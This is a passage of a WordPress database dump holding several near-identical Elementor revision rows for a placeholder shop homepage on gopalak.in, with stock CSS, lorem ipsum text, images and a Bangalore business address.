100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:29:14','2022-09-30 05:59:14','',1373,'https://gopalak.in/?p=1450',0,'revision','',0),(1451,1,'2022-09-30 11:29:14','2022-09-30 05:59:14','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:29:14','2022-09-30 05:59:14','',1373,'https://gopalak.in/?p=1451',0,'revision','',0),(1452,1,'2022-09-30 11:32:56','2022-09-30 06:02:56','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:32:56','2022-09-30 06:02:56','',1373,'https://gopalak.in/?p=1452',0,'revision','',0),(1453,1,'2022-09-30 11:32:57','2022-09-30 06:02:57','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:32:57','2022-09-30 06:02:57','',1373,'https://gopalak.in/?p=1453',0,'revision','',0),(1454,1,'2022-09-30 11:32:57','2022-09-30 06:02:57','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:32:57','2022-09-30 06:02:57','',1373,'https://gopalak.in/?p=1454',0,'revision','',0),(1455,1,'2022-09-30 11:33:24','2022-09-30 06:03:24','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper 